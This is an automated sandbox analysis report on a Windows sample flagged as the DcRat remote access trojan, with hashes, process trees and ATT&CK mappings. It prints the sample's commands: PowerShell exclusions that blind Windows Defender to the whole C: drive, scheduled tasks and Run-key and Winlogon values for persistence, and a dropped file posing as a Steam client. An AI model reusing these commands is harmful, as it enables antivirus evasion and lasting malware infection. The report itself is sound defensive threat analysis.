Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-11-2024 03:31
Static task
static1
Behavioral task
behavioral1
Sample
CE2EC4539435DFEAC7E246FE5565C521.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
CE2EC4539435DFEAC7E246FE5565C521.exe
Resource
win10v2004-20241007-en
General
-
Target
CE2EC4539435DFEAC7E246FE5565C521.exe
-
Size
2.9MB
-
MD5
ce2ec4539435dfeac7e246fe5565c521
-
SHA1
59f3da006005a109914c31b5d5cd94dc4c93309c
-
SHA256
d5ee74f4f460c4f861c01ecc3e22b679075949108b6fee594193695d4175d562
-
SHA512
408a1db2cd98702bca3811e124d78a56cbca79a1d200593759bde1947a4a599f8cd40cd8dbb2e7be7dec416e3f5de0c4466f98ddea1daf6d313671695f25a7ba
-
SSDEEP
49152:6h/814lignPl1s5Cp5+tOCiqgc8I7uBiYUtGGirMn0JkH4SwiLwRktMtL+CsA7Z:6h/8Hgn9u4P+l8I7uB6db0JhAw6tMtLr
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Steam\\steamclient.exe\"" CE2EC4539435DFEAC7E246FE5565C521.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Steam\\steamclient.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\CE2EC4539435DFEAC7E246FE5565C521.exe\"" CE2EC4539435DFEAC7E246FE5565C521.exe -
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 480 1940 schtasks.exe 28 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 1940 schtasks.exe 28 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2800 1940 schtasks.exe 28 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2096 1940 schtasks.exe 28 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 1940 schtasks.exe 28 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 328 1940 schtasks.exe 28 -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2612 powershell.exe 2588 powershell.exe 2484 powershell.exe 2724 powershell.exe 1016 powershell.exe 2676 powershell.exe 800 powershell.exe 2700 powershell.exe 2984 powershell.exe 2012 powershell.exe 2092 powershell.exe 2480 powershell.exe 2548 powershell.exe 352 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2784 steamclient.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\steamclient = "\"C:\\Program Files (x86)\\Steam\\steamclient.exe\"" CE2EC4539435DFEAC7E246FE5565C521.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\steamclient = "\"C:\\Program Files (x86)\\Steam\\steamclient.exe\"" CE2EC4539435DFEAC7E246FE5565C521.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\CE2EC4539435DFEAC7E246FE5565C521 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CE2EC4539435DFEAC7E246FE5565C521.exe\"" CE2EC4539435DFEAC7E246FE5565C521.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CE2EC4539435DFEAC7E246FE5565C521 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\CE2EC4539435DFEAC7E246FE5565C521.exe\"" CE2EC4539435DFEAC7E246FE5565C521.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSCB32719BC980543A78AE64AA8AE9699C.TMP csc.exe File created \??\c:\Windows\System32\byyuy-.exe csc.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\Steam\steamclient.exe CE2EC4539435DFEAC7E246FE5565C521.exe File opened for modification C:\Program Files (x86)\Steam\steamclient.exe CE2EC4539435DFEAC7E246FE5565C521.exe File created C:\Program Files (x86)\Steam\fcafd258929766 CE2EC4539435DFEAC7E246FE5565C521.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2096 schtasks.exe 2044 schtasks.exe 328 schtasks.exe 480 schtasks.exe 2796 schtasks.exe 2800 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 2432 CE2EC4539435DFEAC7E246FE5565C521.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2432 CE2EC4539435DFEAC7E246FE5565C521.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 352 powershell.exe Token: SeDebugPrivilege 2784 steamclient.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 2432 wrote to memory of 3056 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 32 PID 2432 wrote to memory of 3056 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 32 PID 2432 wrote to memory of 3056 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 32 PID 3056 wrote to memory of 604 3056 csc.exe 35 PID 3056 wrote to memory of 604 3056 csc.exe 35 PID 3056 wrote to memory of 604 3056 csc.exe 35 PID 2432 wrote to memory of 2012 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 40 PID 2432 wrote to memory of 2012 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 40 PID 2432 wrote to memory of 2012 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 40 PID 2432 wrote to memory of 2984 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 41 PID 2432 wrote to memory of 2984 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 41 PID 2432 wrote to memory of 2984 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 41 PID 2432 wrote to memory of 352 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 42 PID 2432 wrote to memory of 352 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 42 PID 2432 wrote to memory of 352 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 42 PID 2432 wrote to memory of 1016 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 44 PID 2432 wrote to memory of 1016 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 44 PID 2432 wrote to memory of 1016 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 44 PID 2432 wrote to memory of 2724 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 45 PID 2432 wrote to memory of 2724 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 45 PID 2432 wrote to memory of 2724 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 45 PID 2432 wrote to memory of 2548 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 46 PID 2432 wrote to memory of 2548 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 46 PID 2432 wrote to memory of 2548 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 46 PID 2432 wrote to memory of 2484 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 48 PID 2432 wrote to memory of 2484 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 48 PID 2432 wrote to memory of 2484 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 48 PID 2432 wrote to memory of 2480 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 49 PID 2432 wrote to memory of 2480 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 49 PID 2432 wrote to memory of 2480 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 49 PID 2432 wrote to memory of 2700 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 50 PID 2432 wrote to memory of 2700 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 50 PID 2432 wrote to memory of 2700 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 50 PID 2432 wrote to memory of 2092 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 52 PID 2432 wrote to memory of 2092 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 52 PID 2432 wrote to memory of 2092 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 52 PID 2432 wrote to memory of 2588 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 53 PID 2432 wrote to memory of 2588 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 53 PID 2432 wrote to memory of 2588 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 53 PID 2432 wrote to memory of 800 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 54 PID 2432 wrote to memory of 800 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 54 PID 2432 wrote to memory of 800 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 54 PID 2432 wrote to memory of 2612 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 56 PID 2432 wrote to memory of 2612 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 56 PID 2432 wrote to memory of 2612 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 56 PID 2432 wrote to memory of 2676 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 57 PID 2432 wrote to memory of 2676 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 57 PID 2432 wrote to memory of 2676 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 57 PID 2432 wrote to memory of 1976 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 68 PID 2432 wrote to memory of 1976 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 68 PID 2432 wrote to memory of 1976 2432 CE2EC4539435DFEAC7E246FE5565C521.exe 68 PID 1976 wrote to memory of 2452 1976 cmd.exe 70 PID 1976 wrote to memory of 2452 1976 cmd.exe 70 PID 1976 wrote to memory of 2452 1976 cmd.exe 70 PID 1976 wrote to memory of 2636 1976 cmd.exe 71 PID 1976 wrote to memory of 2636 1976 cmd.exe 71 PID 1976 wrote to memory of 2636 1976 cmd.exe 71 PID 1976 wrote to memory of 2784 1976 cmd.exe 72 PID 1976 wrote to memory of 2784 1976 cmd.exe 72 PID 1976 wrote to memory of 2784 1976 cmd.exe 72 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe"C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe"1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0mf1e0gc\0mf1e0gc.cmdline"2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF8F.tmp" "c:\Windows\System32\CSCB32719BC980543A78AE64AA8AE9699C.TMP"3⤵PID:604
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pWdHaxy7nM.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2452
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:2636
-
-
C:\Program Files (x86)\Steam\steamclient.exe"C:\Program Files (x86)\Steam\steamclient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "steamclients" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Steam\steamclient.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "steamclient" /sc ONLOGON /tr "'C:\Program Files (x86)\Steam\steamclient.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "steamclients" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Steam\steamclient.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CE2EC4539435DFEAC7E246FE5565C521C" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CE2EC4539435DFEAC7E246FE5565C521" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CE2EC4539435DFEAC7E246FE5565C521C" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\Temp\CE2EC4539435DFEAC7E246FE5565C521.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:328
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD5ce2ec4539435dfeac7e246fe5565c521
SHA159f3da006005a109914c31b5d5cd94dc4c93309c
SHA256d5ee74f4f460c4f861c01ecc3e22b679075949108b6fee594193695d4175d562
SHA512408a1db2cd98702bca3811e124d78a56cbca79a1d200593759bde1947a4a599f8cd40cd8dbb2e7be7dec416e3f5de0c4466f98ddea1daf6d313671695f25a7ba
-
Filesize
1KB
MD53cb814ad812398023b7814a80f9e5b85
SHA1e3bea5f8aa227e44e4508074234c5d8d5365af2d
SHA2563e7e27877a40446725747fd9507736e2123ef6a752b37c0bcf5c8f6f2bf5b7af
SHA512fbbb4a7a5528eaffce8221e62cdfeafd6af9aff7c28ab65a9554326f72a2374c295acde8414088851d60239aee997ffa5bf357a784cc11eee824fbceac8bbd34
-
Filesize
220B
MD52d67804436b3951d60ac92e9c488bfcf
SHA114512e0c9ac1f991c746603f98ece6f02606adfe
SHA256b1e9ca66ce06a8b09e945a284b7c8ab746a8c38fc5098232a0e44e26c985785a
SHA512736764eb69d0f73899f90ef8c2c8e208ffcc7260027da91dcbab4bc2ec9dfadad7bcc600f988aa4cafcc8495c201c519d7e4ab47cbbc812dfc63263673b874a0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bb79e05bbf02959b21d76babbd1fbaa7
SHA1842d01addfe73805924ccb5407de9df711bcfc96
SHA256fff9c84988d0cd9855ef3c9c50b30fe9efe8292ca1f64239defb3558acb2db7a
SHA512964e28ea97dbf20325e4507bbb7d095ede73bf6fd3b58fcf93ad8ef2a42bca7c8d021706b0c85aa5490bf91b574a1a12c40ea774162346f013ae89f0a1ed19e7
-
Filesize
376B
MD5915de29bf403fa1efa22af06e29302e1
SHA110d7a0c835055a87ff92a593144152f5e2e00d75
SHA256aabe8e35811a23c351ca6e8e90e9513a2c3427d0b65b4fe225dea2caec5c1d82
SHA512077648b5d4dc99b51b485f3d7ec57d8ef5cd3efae14e8152d8d3f7f8106a53d680becbaf87be196bb7608d6be94a4513d389fe3f28191943da5ccf9f19027740
-
Filesize
235B
MD5e7dbbcf384feeddd992173fda97a6ae6
SHA15a6cfd0428f958b972585afca2ece7b9ae0572c3
SHA256039380f4be08b7583e5ad948e6a7af151bdad3bb2c296ac41d7aeb88e3215a40
SHA51238fc460c6279c8a10eec4a58ac2d4329f8a8dbda048edcf138663634c856f4b6402de385ee985a01b03346a1dd66e32bc5c01d7b234105f499c42396bd1a331b
-
Filesize
1KB
MD5078586b266e519b5c113064d7a0bf45c
SHA1a9395c0ef35add5c75591ebb94c85c1f33f408bf
SHA256ccf292ff9f142b204ad4f4481a044ba8f9ab274305dcb604bf0b8ae91819ab1e
SHA5125b8eb6aad62657309088c4668d633c2aa6324d4824ec32c3c5e133df0a5493a4342c980e077ba565f3aab29c58f95c8db7195415a1e554384405c1457730f959